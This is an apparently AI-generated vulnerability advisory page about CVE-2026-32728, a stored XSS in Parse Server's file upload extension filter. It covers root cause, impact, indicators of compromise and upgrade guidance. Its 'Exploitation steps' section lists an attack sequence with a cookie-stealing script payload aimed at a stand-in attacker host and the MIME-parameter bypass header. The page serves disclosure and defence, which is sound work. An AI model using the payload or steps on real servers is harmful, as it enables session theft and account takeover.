CVE-2026-32728: 
JavaScript vulnerability analysis and mitigation

Overview

CVE-2026-32728 is a stored Cross-Site Scripting (XSS) vulnerability in Parse Server, an open-source Node.js backend framework, caused by a file extension filter bypass via Content-Type MIME parameters and missing XML extension blocklist entries. Disclosed on March 13, 2026, it affects Parse Server versions prior to 8.6.41 and versions 9.0.0 through 9.6.0-alpha.14. It carries a CVSS v3.1 base score of 7.6 (High) and a CVSS v4.0 base score of 8.3 (High) (GitHub Advisory, Parse Server Advisory).

Technical details

The root cause (CWE-79) lies in two related flaws in Parse Server's FilesRouter.js: first, the file extension validation logic failed to strip MIME parameters (e.g., ;charset=utf-8) appended to the Content-Type header before matching against the blocklist regex, allowing the regex to fail to match dangerous types like application/xhtml+xml;charset=utf-8; second, several XML-based extensions capable of rendering active content in browsers (xsd, rng, rdf, rdf+xml, owl, mathml, mathml+xml) were absent from the default blocklist entirely. An authenticated attacker with file upload privileges could exploit either or both weaknesses by crafting an HTTP POST request to the file upload endpoint with a manipulated Content-Type header or a blocked-but-missing extension, causing malicious active content to be stored and served under the application's domain (GitHub Advisory, Patch Commit v9).

Impact

Successful exploitation enables stored XSS attacks, where malicious scripts are persistently hosted under the application's own domain and executed in victims' browsers when they access the uploaded content. This can lead to theft of session tokens, user credentials, and other sensitive data stored in the browser's local storage, potentially enabling account takeover and lateral movement within the application. Confidentiality impact is rated High and integrity impact Low, with no direct availability impact (GitHub Advisory, Parse Server Advisory).

Exploitability

No public proof-of-concept exploit code or evidence of in-the-wild exploitation has been reported as of the time of disclosure (GitHub Advisory). The vulnerability requires low privileges (an account with file upload access) and passive user interaction (a victim must visit or load the malicious file). The EPSS score is approximately 0.05% (3rd percentile), indicating a low near-term exploitation probability. The CVE is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. No threat actor attribution has been reported.

Exploitation steps

  1. Obtain file upload access: Acquire a low-privileged account on a Parse Server instance (versions < 8.6.41 or 9.0.0–9.6.0-alpha.14) that has file upload permissions enabled.
  2. Craft a malicious payload: Prepare an active content file (e.g., an XHTML or SVG file containing a JavaScript payload such as <script>document.location='https://attacker.com/?c='+document.cookie</script>).
  3. Bypass the extension filter via MIME parameter: Send an HTTP POST request to the file upload endpoint (e.g., /1/files/payload) with the Content-Type header set to a blocked type appended with a MIME parameter, such as application/xhtml+xml;charset=utf-8. The unpatched server fails to strip the ;charset=utf-8 suffix before regex matching, allowing the upload to succeed.
  4. Alternatively, use a missing blocked extension: Upload a file with an extension not in the original blocklist (e.g., .xsd, .rng, .owl, .mathml) using its corresponding XML MIME type, which the unpatched server does not block.
  5. Distribute the link: Share the URL of the stored malicious file (served under the application's domain) with target users via phishing, in-app messages, or other social engineering vectors.
  6. Harvest credentials/tokens: When a victim's browser loads the file, the embedded script executes in the context of the application's domain, exfiltrating session tokens or credentials from localStorage to an attacker-controlled server (GitHub Advisory, Patch Commit v9).

Indicators of compromise

  • Network: HTTP POST requests to the Parse Server file upload endpoint (e.g., /1/files/<filename>) with Content-Type headers containing MIME parameters such as ;charset=utf-8 appended to XML/HTML MIME types (e.g., application/xhtml+xml;charset=utf-8, image/svg+xml;charset=utf-8, text/html;charset=utf-8).
  • Network: HTTP POST requests uploading files with extensions xsd, rng, rdf, owl, mathml using XML MIME types to the file upload endpoint on unpatched servers.
  • File System: Presence of uploaded files with extensions .xsd, .rng, .rdf, .owl, .mathml, .xhtml, .svg, .xml, or similar active-content extensions in the Parse Server file storage directory or connected object storage bucket.
  • Logs: Parse Server access logs showing successful 201 Created responses for file uploads with the above suspicious Content-Type values or file extensions that should have been blocked.
  • Logs: Subsequent GET requests from multiple different client IPs to the stored malicious file URL, potentially indicating victim access after a phishing campaign.

Mitigation and workarounds

Upgrade Parse Server to version 8.6.41 (for the v8 branch) or 9.6.0-alpha.15 / 9.6.0 or later (for the v9 branch), which strip MIME parameters from the Content-Type header before extension validation and extend the default blocklist to include xsd, rng, rdf, rdf+xml, owl, mathml, and mathml+xml (GitHub Advisory, Parse Server Advisory). As a workaround for those unable to upgrade immediately, configure the fileUpload.fileExtensions option as an allowlist of only the specific file extensions your application legitimately requires (e.g., ["^jpg$", "^png$", "^pdf$"]), rather than relying on the default blocklist. The Parse Server maintainers explicitly recommend the allowlist approach as the long-term security best practice, since new dangerous extensions may emerge that are not covered by any default blocklist (Parse Server Advisory).

Community reactions

The vulnerability was reported by security researcher fancymalware and coordinated by Parse Server maintainer mtrezza, who published the advisory and patches on March 13, 2026 (Parse Server Advisory). RedPacketSecurity flagged the CVE on social media (Mastodon and X/Twitter) shortly after NVD publication, contributing to broader community awareness. The fix was included in the stable Parse Server 9.6.0 release on March 22, 2026, alongside a large batch of other security fixes, reflecting an active security hardening effort by the Parse community.

Additional resources


Source: This report was generated using AI

Related JavaScript vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

GHSA-w2vw-w76x-qr89HIGH8.5
  • JavaScript logoJavaScript
  • nx
NoYesOct 05, 2026
CVE-2026-104852HIGH8.2
  • JavaScript logoJavaScript
  • @graphql-tools/utils
NoYesOct 05, 2026
GHSA-g7fw-3gjp-g5hfMEDIUM6.5
  • JavaScript logoJavaScript
  • @openclaw/matrix
NoYesOct 05, 2026
GHSA-r4xh-jqrq-34v2MEDIUM5.3
  • JavaScript logoJavaScript
  • smol-toml
NoYesOct 05, 2026
GHSA-6688-9rhm-gjv2LOWN/A
  • JavaScript logoJavaScript
  • dompurify
NoYesOct 05, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management